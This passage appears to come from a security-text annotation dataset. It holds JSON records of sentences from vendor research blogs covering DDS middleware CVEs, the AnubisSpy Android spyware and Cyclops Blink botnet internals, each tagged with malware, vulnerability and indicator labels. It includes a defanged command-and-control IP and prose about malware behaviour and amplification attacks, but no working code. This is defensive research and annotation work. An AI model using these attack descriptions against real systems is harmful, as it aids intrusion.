the supply chain as a layer that connects, controls, and monitors applications, sensors, and actuators, aimed at maintaining interoperability and fault tolerance.","entities":[],"relations":[],"Comments":[]} {"id":5173,"text":"It is used in various critical sectors such as healthcare, transportation, industrial internet of things (IIoT), robotics, aeronautics, and the military, among others.","entities":[],"relations":[],"Comments":[]} {"id":5174,"text":"Given these factors, this makes the middleware technology an attractive target for attackers.","entities":[],"relations":[],"Comments":[]} {"id":5175,"text":"We analyzed this software and found multiple security vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":5176,"text":"This blog lists 13 identified security gaps that were assigned new CVE IDs found in the six most common DDS implementations, mostly concerning deployment.","entities":[],"relations":[],"Comments":[]} {"id":5177,"text":"We also show a preview of the security gaps we found in the standard’s specification and a summary of our testing procedure.","entities":[],"relations":[],"Comments":[]} {"id":5178,"text":"For details on the known vulnerabilities, attack scenarios, and research methodology, read our full paper “A Security Analysis of the Data Distribution Service (DDS) Protocol.”","entities":[],"relations":[],"Comments":[]} {"id":5179,"text":"All the vulnerabilities found have been disclosed and patched or mitigated by their respective vendors.","entities":[],"relations":[],"Comments":[]} {"id":5180,"text":"New vulnerabilities","entities":[],"relations":[],"Comments":[]} {"id":5181,"text":"We studied six widely used DDS implementations, chosen based on executions’ number of users and customers in the critical sectors globally.","entities":[],"relations":[],"Comments":[]} {"id":5182,"text":" We also looked at each implementation’s real-time publish-subscribe (RTPS) packet, as DDS is dependent on its own lower layer standard protocol.","entities":[],"relations":[],"Comments":[]} {"id":5183,"text":"Notably, we also studied the Robot Operating System 2 (ROS 2) because it uses DDS as its default standard operating system (OS) middleware for all robotics and automation use cases.","entities":[{"id":51230,"label":"SOFTWARE","start_offset":29,"end_offset":61}],"relations":[],"Comments":[]} {"id":5184,"text":"Given the service’s position as a security and operations building block, all vulnerabilities that affect DDS also affect the rest of the software stack, such as RTPS and all ROS 2 instances.","entities":[{"id":51231,"label":"SOFTWARE","start_offset":175,"end_offset":180},{"id":51232,"label":"SOFTWARE","start_offset":162,"end_offset":166}],"relations":[],"Comments":[]} {"id":5185,"text":" Product Name","entities":[],"relations":[],"Comments":[]} {"id":5186,"text":"Developer HQ Region Open Source","entities":[],"relations":[],"Comments":[]} {"id":5187,"text":"Core Language Year Developed Fast-DDS eProsima EMEA Apache License 2.0 C++ 2014 Cyclone DDS Eclipse Foundation project, driven by ADLINK EMEA Eclipse Public License 2.0 and Eclipse Development License 1.0 C 2011 OpenDDS OCI NABU Custom C++ 2005 Connext DDS RTI NABU Extensions are open source C++ 2005 (NDDS – 1995) CoreDX DDS TwinOaks NABU Not open source C 2009 Gurum DDS GurumNetworks APAC Not open source C Table 1.","entities":[],"relations":[],"Comments":[]} {"id":5188,"text":"A list of all DDS implementations analyzed for this research.","entities":[],"relations":[],"Comments":[]} {"id":5189,"text":"MITRE ATT&CK ICS Attack Surface Vector CVE Scope CVSS Weaknesses (CWE) T0804:","entities":[{"id":51233,"label":"identity","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":5190,"text":"Brute Force I\/O T0814: DoS T0827: Loss of Control T0880: Loss of Safety T0802: Automated Collection T0846: Remote System Discovery T0856: Spoof of Reporting Message","entities":[{"id":51234,"label":"attack-pattern","start_offset":138,"end_offset":164},{"id":15964,"label":"attack-pattern","start_offset":0,"end_offset":11},{"id":15966,"label":"attack-pattern","start_offset":79,"end_offset":99},{"id":15967,"label":"attack-pattern","start_offset":107,"end_offset":130}],"relations":[],"Comments":[]} {"id":5191,"text":" Network RTPS discovery packet CVE-2021-38425 Fast-DDS, ROS 2 7.5 CWE-406: Network amplification CVE-2021-38429 OpenDDS, ROS 2 7.5 CVE-2021-38487 Connext DDS, ROS 2 7.5 CVE-2021-43547 CoreDX DDS, ROS 2 7.5 Malformed RTPS packet CVE-2021-38447 OpenDDS, ROS 2 8.6 CWE-405:","entities":[{"id":51235,"label":"vulnerability","start_offset":31,"end_offset":45},{"id":51237,"label":"vulnerability","start_offset":131,"end_offset":145},{"id":51238,"label":"vulnerability","start_offset":169,"end_offset":183},{"id":51239,"label":"vulnerability","start_offset":228,"end_offset":242},{"id":51236,"label":"vulnerability","start_offset":97,"end_offset":111}],"relations":[],"Comments":[]} {"id":5192,"text":"Network amplification CVE-2021-38445 OpenDDS, ROS 2 7.0 CWE-130: Improper handling of length CVE-2021-38423 Gurum DDS, ROS 2 8.6 CWE-131: Incorrect calculation of buffer size CVE-2021-38435 Connext DDS, ROS 2 8.6 CVE-2021-38439 Gurum DDS, ROS 2 8.6 CWE-122:","entities":[{"id":51240,"label":"vulnerability","start_offset":22,"end_offset":36},{"id":51241,"label":"vulnerability","start_offset":93,"end_offset":107},{"id":51242,"label":"vulnerability","start_offset":175,"end_offset":189},{"id":51243,"label":"vulnerability","start_offset":213,"end_offset":227}],"relations":[],"Comments":[]} {"id":5193,"text":"Heap-based buffer overflow T0862: Supply Chain Compromise T0839: Module Firmware T0873: Project File Infection","entities":[{"id":51244,"label":"attack-pattern","start_offset":88,"end_offset":110},{"id":15977,"label":"attack-pattern","start_offset":11,"end_offset":26},{"id":15978,"label":"attack-pattern","start_offset":34,"end_offset":57}],"relations":[],"Comments":[]} {"id":5194,"text":" Configuration XML file CVE-2021-38427 Connext DDS, ROS 2 6.6 CWE-121: Stack-based buffer overflow CVE-2021-38433 Connext DDS, ROS 2 6.6 CVE-2021-38443 Cyclone DDS, ROS 2 6.6 CWE-228: Improper handling of syntactically invalid structure CVE-2021-38441 Cyclone DDS, ROS 2 6.6 CWE-123:","entities":[{"id":51247,"label":"vulnerability","start_offset":99,"end_offset":113},{"id":51248,"label":"vulnerability","start_offset":137,"end_offset":151},{"id":51245,"label":"attack-pattern","start_offset":71,"end_offset":98},{"id":51246,"label":"vulnerability","start_offset":24,"end_offset":38},{"id":51249,"label":"vulnerability","start_offset":237,"end_offset":251}],"relations":[],"Comments":[]} {"id":5195,"text":"Write-what-where condition Table 2.","entities":[],"relations":[],"Comments":[]} {"id":5196,"text":"A summary of our findings across the main DDS implementations and standard specification.","entities":[],"relations":[],"Comments":[]} {"id":5197,"text":" When the security gaps on the network attack surface are exploited, it allows an attacker to perform spoofing, reconnaissance, automated data collection, and denial of service (DoS), affecting the control of an exposed system.","entities":[],"relations":[],"Comments":[]} {"id":5198,"text":"Meanwhile, the vulnerabilities we found on the configuration attack surface can be abused to affect the DDS developer or system integrator, potentially compromising the integrity of the software supply chain.","entities":[],"relations":[],"Comments":[]} {"id":5199,"text":"Vulnerabilities in the standard specification","entities":[],"relations":[],"Comments":[]} {"id":5200,"text":"The built-in RTPS discovery protocol is used in peer-to-peer networks to discover the locator of each participant (such as IP address and UDP\/TCP port or offset in shared memory).","entities":[],"relations":[],"Comments":[]} {"id":5201,"text":"The “chatty” nature of this discovery protocol and the fact that it expects a reply from each contacted participant, paired with easy-to-spoof transport protocols such as the User Datagram Protocol (UDP), make RTPS vulnerable to network reflection and amplification.","entities":[{"id":51250,"label":"attack-pattern","start_offset":229,"end_offset":265}],"relations":[],"Comments":[]} {"id":5202,"text":"Confidentiality and authenticity for this data is not protected even with DDS Security, making it possible for an attacker to spoof the information. CVE ID","entities":[],"relations":[],"Comments":[]} {"id":5203,"text":"Scope","entities":[],"relations":[],"Comments":[]} {"id":5204,"text":"Partially Mitigated*","entities":[],"relations":[],"Comments":[]} {"id":5205,"text":"BAF Percentage of Attack Duration (Total experiment duration = 139s) CVE-2021-38425 Fast-DDS, ROS 2 master branch 9.875 100.0 CVE-2021-38429 OpenDDS, ROS 2 >= 3.18.1 18.68 24.17 CVE-2021-38487","entities":[{"id":51251,"label":"vulnerability","start_offset":70,"end_offset":84},{"id":51252,"label":"vulnerability","start_offset":127,"end_offset":141},{"id":51253,"label":"vulnerability","start_offset":179,"end_offset":193}],"relations":[],"Comments":[]} {"id":5206,"text":"Connext DDS, ROS 2 >= 6.1.0 2.011 84.17 CVE-2021-43547 CoreDX DDS, ROS 2 > 5.9.1 32.82 18.14 Table 3.","entities":[{"id":51254,"label":"vulnerability","start_offset":40,"end_offset":54}],"relations":[],"Comments":[]} {"id":5207,"text":"The network reflection and amplification vulnerability with bandwidth amplification factor (BAF) is calculated as the ratio between outbound and reflected traffic.","entities":[{"id":51256,"label":"vulnerability","start_offset":4,"end_offset":96}],"relations":[],"Comments":[]} {"id":5208,"text":"Note: Implementations with less than 100% attack duration likely have a timeout mechanism.","entities":[],"relations":[],"Comments":[]} {"id":5209,"text":"(*) A full mitigation will require relevant changes in the RTPS specification.","entities":[],"relations":[],"Comments":[]} {"id":5210,"text":" The longest running node was based on Connext DDS (at 139 seconds), which we kept as a reference.","entities":[],"relations":[],"Comments":[]} {"id":5211,"text":"Table 3 shows that the BAF is greater than one, implying there are asymmetric network flows although the values are at the order of magnitude lower than modern amplification attacks (note that Memcached can reach 10,000 to 51,000 BAF).","entities":[],"relations":[],"Comments":[]} {"id":5212,"text":"However, the network bandwidth in embedded systems is also lower than, for example, what internet nodes can provide.","entities":[],"relations":[],"Comments":[]} {"id":5213,"text":"An attacker can abuse this built-in discovery feature for remote discovery and fingerprinting.","entities":[],"relations":[],"Comments":[]} {"id":5214,"text":"We sent RPTS discovery probes to the entire IPv4 space (except for the no-scan subnets) and received answers from 643 hosts (excluding obvious honeypots).","entities":[],"relations":[],"Comments":[]} {"id":5215,"text":"Notably, hosts never stopped sending traffic to us, even if we only sent them a single 288-byte packet.","entities":[],"relations":[],"Comments":[]} {"id":5216,"text":"This new network-reflection vulnerability that we found is not the only instance of a specification-level vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":5217,"text":"Security researchers from different organizations have been documenting and creating attack scenarios abusing these vulnerabilities as early as 2015.","entities":[{"id":51257,"label":"TIME","start_offset":144,"end_offset":148}],"relations":[],"Comments":[]} {"id":5218,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} {"id":5219,"text":"Proper supply chain management processes allow contextualization, tracking, and monitoring of new vulnerabilities within different downstream software using a specific library such as DDS.","entities":[],"relations":[],"Comments":[]} {"id":5220,"text":"In the case of this middleware technology, DDS is just one of the many critical libraries used in embedded applications that’s easy to lose track of.","entities":[],"relations":[],"Comments":[]} {"id":5221,"text":"Our paper, “A Security Analysis of the Data Distribution Service (DDS) Protocol,” includes short- and long-term mitigation best practices and recommendations, as well as a consideration for adopting a shift-left approach.","entities":[],"relations":[],"Comments":[]} {"id":5222,"text":"We also acknowledge the cooperation and engaging response that some vendors like ADLINK have adopted when we approached them with our findings.","entities":[{"id":51258,"label":"identity","start_offset":81,"end_offset":87}],"relations":[],"Comments":[]} {"id":5223,"text":"As we encourage more DDS researchers, users, and implementors to keep on studying and promoting security awareness for the DDS ecosystem, we hope the level of engagement we received can serve as a model for the software industry.","entities":[],"relations":[],"Comments":[]} {"id":5224,"text":"Download our full paper here.","entities":[],"relations":[],"Comments":[]} {"id":5225,"text":" Tags Exploits & Vulnerabilities | Research | Cyber Threats | ICS OT | APT & Targeted Attacks | Compliance & Risks | IoT | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} {"id":5226,"text":"Android malware like ransomware exemplify how the platform can be lucrative for cybercriminals.","entities":[{"id":51259,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} {"id":5227,"text":"But there are also other threats stirring up as of late: attacks that spy on and steal data from specific targets, crossing over between desktops and mobile devices.","entities":[],"relations":[],"Comments":[]} {"id":5228,"text":"Take for instance several malicious apps we came across with cyberespionage capabilities, which were targeting Arabic-speaking users or Middle Eastern countries.","entities":[{"id":51260,"label":"location","start_offset":136,"end_offset":150}],"relations":[],"Comments":[]} {"id":5229,"text":"These were published on Google Play — but have since been taken down — and third-party app marketplaces.","entities":[{"id":51261,"label":"SOFTWARE","start_offset":24,"end_offset":35}],"relations":[],"Comments":[]} {"id":5230,"text":"We named these malicious apps AnubisSpy (ANDROIDOS_ANUBISSPY) as all the malware’s payload is a package called watchdog.","entities":[{"id":51263,"label":"malware","start_offset":111,"end_offset":119},{"id":51262,"label":"malware","start_offset":41,"end_offset":60},{"id":16073,"label":"malware","start_offset":30,"end_offset":39}],"relations":[{"id":1072,"from_id":51262,"to_id":16073,"type":"duplicate-of"}],"Comments":[]} {"id":5231,"text":"We construe AnubisSpy to be linked to the cyberespionage campaign Sphinx (APT-C-15) based on shared file structures and command-and-control (C&C) server as well as targets.","entities":[{"id":51265,"label":"campaign","start_offset":65,"end_offset":83},{"id":51264,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} {"id":5232,"text":"It’s also possible that while AnubisSpy’s operators may also be Sphinx’s, they could be running separate but similar campaigns.","entities":[{"id":51266,"label":"campaign","start_offset":64,"end_offset":70},{"id":16081,"label":"malware","start_offset":30,"end_offset":39}],"relations":[],"Comments":[]} {"id":5233,"text":" What can AnubisSpy do?","entities":[{"id":16085,"label":"malware","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":5234,"text":" AnubisSpy can steal messages (SMS), photos, videos, contacts, email accounts, calendar events, and browser histories (i.e., Chrome and Samsung Internet Browser).","entities":[{"id":51267,"label":"malware","start_offset":1,"end_offset":10},{"id":51268,"label":"attack-pattern","start_offset":15,"end_offset":35},{"id":51269,"label":"SOFTWARE","start_offset":125,"end_offset":131},{"id":51270,"label":"SOFTWARE","start_offset":136,"end_offset":160}],"relations":[],"Comments":[]} {"id":5235,"text":"It can also take screenshots and record audio, including calls.","entities":[],"relations":[],"Comments":[]} {"id":5236,"text":"It can spy on the victim through apps installed on the device, a list of which is in its configuration file that can be updated.","entities":[],"relations":[],"Comments":[]} {"id":5237,"text":"This includes Skype, WhatsApp, Facebook, and Twitter, among others.","entities":[{"id":51273,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":51271,"label":"SOFTWARE","start_offset":14,"end_offset":19},{"id":51272,"label":"SOFTWARE","start_offset":21,"end_offset":29},{"id":51274,"label":"SOFTWARE","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} {"id":5238,"text":"After the data are collected, they are encrypted and sent to the (C&C) server.","entities":[],"relations":[],"Comments":[]} {"id":5239,"text":"AnubisSpy can also self-destruct to cover its tracks.","entities":[{"id":16104,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5240,"text":"It can run commands and delete files on the device, as well as install and uninstall Android Application Packages (APKs).","entities":[],"relations":[],"Comments":[]} {"id":5241,"text":"AnubisSpy has several modules, each of which has a separate role.","entities":[{"id":51275,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5242,"text":"AnubisSpy’s code is well constructed, indicating the developer\/s’ know-how.","entities":[{"id":51276,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5243,"text":"Below is a visualization of the modules: Figure 1: Structure of AnubisSpy’s modules","entities":[{"id":51277,"label":"malware","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} {"id":5244,"text":"How is AnubisSpy related to Sphinx?","entities":[{"id":51278,"label":"campaign","start_offset":28,"end_offset":34},{"id":16114,"label":"malware","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} {"id":5245,"text":" Sphinx reportedly uses the watering hole technique via social media sites to deliver its payloads — mainly a customized version of njRAT.","entities":[{"id":51279,"label":"campaign","start_offset":1,"end_offset":7},{"id":51280,"label":"malware","start_offset":132,"end_offset":137}],"relations":[{"id":1073,"from_id":51279,"to_id":51280,"type":"uses"}],"Comments":[]} {"id":5246,"text":"The Sphinx campaign operators cloaked the malware with icons of legitimate applications to dupe recipients into clicking them.","entities":[{"id":51281,"label":"campaign","start_offset":4,"end_offset":10}],"relations":[],"Comments":[]} {"id":5247,"text":"Sphinx was active between June 2014 and November 2015, but timestamps of the malware indicate the attacks started as early as 2011.","entities":[{"id":51283,"label":"TIME","start_offset":26,"end_offset":35},{"id":51285,"label":"TIME","start_offset":126,"end_offset":130},{"id":51282,"label":"campaign","start_offset":0,"end_offset":6},{"id":51284,"label":"TIME","start_offset":40,"end_offset":53}],"relations":[],"Comments":[]} {"id":5248,"text":"A simple WHOIS query of AnubisSpy’s C&C server showed it abused a legitimate managed hosting service provider in Belize.","entities":[{"id":51286,"label":"location","start_offset":113,"end_offset":119},{"id":16127,"label":"malware","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} {"id":5249,"text":"We correlated the AnubisSpy variants to Sphinx’s desktop\/PC-targeting malware through the following: Shared C&C server, 86[.]105[.]18[.]107 Shared technique of decrypting JSON files, and similarity between the file structures of AnubisSpy and Sphinx’s malware Similar targets (highly concentrated in Middle Eastern countries) Figure 2: Comparison of file structure in Sphinx’s desktop\/PC-targeting malware (left) and AnubisSpy (right)","entities":[{"id":51288,"label":"malware","start_offset":18,"end_offset":27},{"id":51287,"label":"location","start_offset":301,"end_offset":315},{"id":16131,"label":"IPV4","start_offset":121,"end_offset":140},{"id":16134,"label":"malware","start_offset":230,"end_offset":239},{"id":16130,"label":"campaign","start_offset":40,"end_offset":46},{"id":16142,"label":"malware","start_offset":422,"end_offset":431},{"id":16140,"label":"campaign","start_offset":373,"end_offset":379},{"id":16136,"label":"campaign","start_offset":244,"end_offset":250}],"relations":[{"id":1074,"from_id":16130,"to_id":51288,"type":"uses"},{"id":1075,"from_id":16131,"to_id":16130,"type":"indicates"},{"id":1076,"from_id":16136,"to_id":51287,"type":"targets"},{"id":1077,"from_id":16134,"to_id":51287,"type":"targets"}],"Comments":[]} {"id":5250,"text":"These apps were all written in Arabic and, in one way or another, related to something in Egypt (i.e., spoofing an Egypt-based TV program and using news\/stories in the Middle East) regardless of the labels and objects in the apps.","entities":[{"id":51289,"label":"location","start_offset":90,"end_offset":95},{"id":51290,"label":"location","start_offset":168,"end_offset":179}],"relations":[],"Comments":[]} {"id":5251,"text":"Our coordination with Google also revealed that these apps were installed across a handful of countries in the Middle East.","entities":[{"id":51291,"label":"identity","start_offset":22,"end_offset":28},{"id":51292,"label":"location","start_offset":111,"end_offset":122}],"relations":[],"Comments":[]} {"id":5252,"text":" Was AnubisSpy actively distributed?","entities":[{"id":51293,"label":"malware","start_offset":5,"end_offset":14}],"relations":[],"Comments":[]} {"id":5253,"text":"We analyzed seven apps that were actually AnubisSpy.","entities":[{"id":51294,"label":"malware","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} {"id":5254,"text":"These were signed with the same fake Google certificates.","entities":[],"relations":[],"Comments":[]} {"id":5255,"text":"We found two more apps created by the same developer, but they had no espionage-related codes; we think they were made as experimental projects.","entities":[],"relations":[],"Comments":[]} {"id":5256,"text":"Based on hardcoded strings in the Agent Version, the malicious apps were developed as early as April 2015.","entities":[{"id":51295,"label":"TIME","start_offset":95,"end_offset":105}],"relations":[],"Comments":[]} {"id":5257,"text":"Timestamps indicate that the earliest sample was signed on June 2015; the latest variant was signed on May 2017.","entities":[{"id":51296,"label":"TIME","start_offset":59,"end_offset":68},{"id":51297,"label":"TIME","start_offset":103,"end_offset":111}],"relations":[],"Comments":[]} {"id":5258,"text":"AnubisSpy wasn’t only published on Google Play.","entities":[{"id":51299,"label":"SOFTWARE","start_offset":35,"end_offset":46},{"id":51298,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5259,"text":"We also found versions of it in third-party app marketplaces, most likely as a way to expand the malware’s reach.","entities":[],"relations":[],"Comments":[]} {"id":5260,"text":"The apps mainly used Middle East-based news and sociopolitical themes as social engineering hooks and abused social media to further proliferate.","entities":[{"id":51300,"label":"attack-pattern","start_offset":73,"end_offset":91},{"id":51301,"label":"attack-pattern","start_offset":102,"end_offset":121}],"relations":[],"Comments":[]} {"id":5261,"text":"Versions of AnubisSpy posed as social news, promotional, healthcare, and entertainment apps.","entities":[{"id":51302,"label":"malware","start_offset":12,"end_offset":21}],"relations":[],"Comments":[]} {"id":5262,"text":"What does AnubisSpy mean to the mobile landscape?","entities":[{"id":16180,"label":"malware","start_offset":10,"end_offset":19}],"relations":[],"Comments":[]} {"id":5263,"text":"Persistent and furtive spyware is an underrated problem for the mobile platform.","entities":[],"relations":[],"Comments":[]} {"id":5264,"text":"While cyberespionage campaigns on mobile devices may be few and far between compared to ones for desktops or PCs, AnubisSpy proves that they do indeed occur, and may have been more active than initially thought.","entities":[{"id":51303,"label":"malware","start_offset":114,"end_offset":123}],"relations":[],"Comments":[]} {"id":5265,"text":"Will mobile become cyberespionage’s main frontier?","entities":[],"relations":[],"Comments":[]} {"id":5266,"text":"It won’t be a surprise given mobile platform’s increasing ubiquity, especially in workplaces.","entities":[],"relations":[],"Comments":[]} {"id":5267,"text":"Beyond its effects, AnubisSpy also highlights the significance of proactively securing mobile devices, particularly if they’re on BYOD programs and used to access sensitive data.","entities":[{"id":51304,"label":"malware","start_offset":20,"end_offset":29}],"relations":[],"Comments":[]} {"id":5268,"text":"Enforcing the principle of least privilege and implementing an app reputation system are just some of the best practices that can help mitigate threats.","entities":[],"relations":[],"Comments":[]} {"id":5269,"text":"We disclosed our findings to Google on October 12 and worked with Google on further analyzing the AnubisSpy-related apps.","entities":[{"id":51306,"label":"TIME","start_offset":39,"end_offset":49},{"id":51308,"label":"malware","start_offset":98,"end_offset":107},{"id":51305,"label":"identity","start_offset":29,"end_offset":35},{"id":51307,"label":"identity","start_offset":66,"end_offset":72}],"relations":[],"Comments":[]} {"id":5270,"text":"Updates were also made to Google Play Protect to take appropriate action against those apps that have been verified as in violation of Google Play policy.","entities":[{"id":51309,"label":"SOFTWARE","start_offset":26,"end_offset":45},{"id":51310,"label":"SOFTWARE","start_offset":135,"end_offset":146}],"relations":[],"Comments":[]} {"id":5271,"text":"An in-depth technical analysis of AnubisSpy, along with indicators of compromise, is in this technical brief.","entities":[{"id":51311,"label":"malware","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} {"id":5272,"text":" Trend Micro Solutions End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security which is also available on Google Play.","entities":[{"id":51313,"label":"SOFTWARE","start_offset":118,"end_offset":146},{"id":51312,"label":"SOFTWARE","start_offset":1,"end_offset":22},{"id":51314,"label":"SOFTWARE","start_offset":174,"end_offset":185}],"relations":[],"Comments":[]} {"id":5273,"text":"For organizations, Trend Micro™ Mobile Security for Enterprise provides device, compliance and application management, data protection, and configuration provisioning, as well as protects devices from attacks that leverage vulnerabilities, preventing unauthorized access to apps, as well as detecting and blocking malware and fraudulent websites.","entities":[{"id":51315,"label":"SOFTWARE","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} {"id":5274,"text":"Trend Micro’s Mobile App Reputation Service (MARS) covers Android and iOS threats using leading sandbox and machine learning technologies.","entities":[{"id":51317,"label":"SOFTWARE","start_offset":58,"end_offset":65},{"id":51318,"label":"SOFTWARE","start_offset":70,"end_offset":73},{"id":51316,"label":"SOFTWARE","start_offset":0,"end_offset":50}],"relations":[],"Comments":[]} {"id":5275,"text":"It can protect users against malware, zero-day and known exploits, privacy leaks, and application vulnerability.","entities":[],"relations":[],"Comments":[]} {"id":5276,"text":" Tags Malware | APT & Targeted Attacks | Endpoints | Research |","entities":[],"relations":[],"Comments":[]} {"id":5277,"text":"Mobile","entities":[],"relations":[],"Comments":[]} {"id":5278,"text":"With additional insights from Philippe Z Lin Note: This article has been updated on March 17, 2022, 2:00 a.m. ET to include Asus’ security bulletin.","entities":[{"id":51321,"label":"identity","start_offset":124,"end_offset":128},{"id":51320,"label":"TIME","start_offset":84,"end_offset":112},{"id":51319,"label":"identity","start_offset":30,"end_offset":44}],"relations":[],"Comments":[]} {"id":5279,"text":"Cyclops Blink, an advanced modular botnet that is reportedly linked to the Sandworm or Voodoo Bear advanced persistent threat (APT) group, has recently been used to target WatchGuard Firebox devices according to an analysis performed by the UK’s National Cyber Security Centre (NCSC).","entities":[{"id":51322,"label":"malware","start_offset":0,"end_offset":13},{"id":51324,"label":"threat-actor","start_offset":87,"end_offset":98},{"id":51323,"label":"threat-actor","start_offset":75,"end_offset":83},{"id":51325,"label":"identity","start_offset":241,"end_offset":283}],"relations":[{"id":1078,"from_id":51324,"to_id":51323,"type":"duplicate-of"},{"id":1079,"from_id":51322,"to_id":51323,"type":"related-to"}],"Comments":[]} {"id":5280,"text":"We acquired a variant of the Cyclops Blink malware family that targets Asus routers.","entities":[{"id":51326,"label":"malware","start_offset":29,"end_offset":42},{"id":51327,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} {"id":5281,"text":"This report discusses the technical capabilities of this Cyclops Blink malware variant and includes a list of more than 150 current and historical command-and-control (C&C) servers of the Cyclops Blink botnet.","entities":[{"id":51328,"label":"malware","start_offset":57,"end_offset":70},{"id":51329,"label":"malware","start_offset":188,"end_offset":201}],"relations":[],"Comments":[]} {"id":5282,"text":"This list aims to aid cybersecurity defenders in searching for affected devices in their networks and starting the remediation process.","entities":[],"relations":[],"Comments":[]} {"id":5283,"text":" We have reached out to Asus regarding our investigation, and they have created a security bulletin that includes a security checklist to help prevent Cyclops Blink attacks, as well as a list of affected Asus products.","entities":[{"id":51330,"label":"malware","start_offset":151,"end_offset":164},{"id":51331,"label":"identity","start_offset":204,"end_offset":208}],"relations":[],"Comments":[]} {"id":5284,"text":"Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.","entities":[{"id":51332,"label":"malware","start_offset":34,"end_offset":47},{"id":51334,"label":"SOFTWARE","start_offset":109,"end_offset":127},{"id":51335,"label":"SOFTWARE","start_offset":132,"end_offset":144}],"relations":[{"id":1080,"from_id":51332,"to_id":51334,"type":"targets"},{"id":1081,"from_id":51332,"to_id":51335,"type":"targets"}],"Comments":[]} {"id":5285,"text":"Hence, we believe that it is possible that the Cyclops Blink botnet’s main purpose is to build an infrastructure for further attacks on high-value targets.","entities":[{"id":51333,"label":"malware","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} {"id":5286,"text":"Cyclops Blink has been around since at least June 2019, and a considerable number of its C&C servers and bots are active for up to about three years.","entities":[{"id":51336,"label":"malware","start_offset":0,"end_offset":13},{"id":51337,"label":"TIME","start_offset":45,"end_offset":54}],"relations":[],"Comments":[]} {"id":5287,"text":" The Sandworm APT group has been attributed as creating both Cyclops Blink and the VPNFilter internet of things (IoT) botnet.","entities":[{"id":51338,"label":"threat-actor","start_offset":6,"end_offset":14},{"id":51339,"label":"malware","start_offset":62,"end_offset":75},{"id":51340,"label":"malware","start_offset":84,"end_offset":93}],"relations":[{"id":1083,"from_id":51340,"to_id":51338,"type":"attributed-to"},{"id":1082,"from_id":51339,"to_id":51338,"type":"attributed-to"}],"Comments":[]} {"id":5288,"text":"VPNFilter, first discovered in 2018, targeted router and storage devices.","entities":[{"id":51341,"label":"TIME","start_offset":31,"end_offset":35},{"id":16290,"label":"malware","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} {"id":5289,"text":"It was also reported to have infected hundreds of thousands of devices.","entities":[],"relations":[],"Comments":[]} {"id":5290,"text":"In 2021, Trend Micro published a technical analysis of VPNFilter, which includes a discussion of how the botnet continues to affect infected systems two years after its discovery.","entities":[{"id":51344,"label":"malware","start_offset":55,"end_offset":64},{"id":51342,"label":"TIME","start_offset":3,"end_offset":7},{"id":51343,"label":"identity","start_offset":9,"end_offset":20}],"relations":[],"Comments":[]} {"id":5291,"text":"Sandworm was also responsible for many high-profile attacks, including the 2015 and 2016 attacks on the Ukrainian electrical grid, the 2017 NotPetya attack, the 2017 French presidential campaign, the 2018 Olympic Destroyer attack on the Winter Olympic Games, and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW). Cyclops Blink malware analysis Cyclops Blink is a modular malware written in the C language.","entities":[{"id":51352,"label":"TIME","start_offset":265,"end_offset":269},{"id":51345,"label":"threat-actor","start_offset":0,"end_offset":8},{"id":51350,"label":"TIME","start_offset":161,"end_offset":165},{"id":51354,"label":"malware","start_offset":354,"end_offset":367},{"id":51355,"label":"malware","start_offset":386,"end_offset":399},{"id":51346,"label":"TIME","start_offset":75,"end_offset":79},{"id":51347,"label":"TIME","start_offset":84,"end_offset":88},{"id":51349,"label":"campaign","start_offset":140,"end_offset":155},{"id":51351,"label":"TIME","start_offset":200,"end_offset":204},{"id":51348,"label":"TIME","start_offset":135,"end_offset":139}],"relations":[],"Comments":[]} {"id":5292,"text":"In its core component, the first thing that the malware does is to check if its executable file name starts with \"[k\".","entities":[],"relations":[],"Comments":[]} {"id":5293,"text":"If it does not, it performs the following routine: It redirects both stdout and stderr file descriptors to \/dev\/null.","entities":[{"id":51356,"label":"FILEPATH","start_offset":109,"end_offset":118}],"relations":[],"Comments":[]} {"id":5294,"text":" It sets the default handlers for SIGTERM, SIGINT, SIGBUS, SIGPIPE, and SIGIO signals.","entities":[],"relations":[],"Comments":[]} {"id":5295,"text":" It reloads itself with a new \"[ktest]\" process name.","entities":[],"relations":[],"Comments":[]} {"id":5296,"text":" It then waits for 37 seconds before it sets up its hard-coded parameters.","entities":[],"relations":[],"Comments":[]} {"id":5297,"text":"These include the hard-coded C&C servers and the interval that should be used to communicate with the C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":5298,"text":" It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data.","entities":[],"relations":[],"Comments":[]} {"id":5299,"text":"It also enables non-blocking I\/O for the writing file descriptor by using ioctl().","entities":[],"relations":[],"Comments":[]} {"id":5300,"text":" After this, a new data packet will be created in memory, which will then be sent to a C&C server.","entities":[],"relations":[],"Comments":[]} {"id":5301,"text":"The details of this communication are covered later in this analysis.","entities":[],"relations":[],"Comments":[]} {"id":5302,"text":"For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter — the Linux kernel firewall — using the iptc_insert_entry() function from 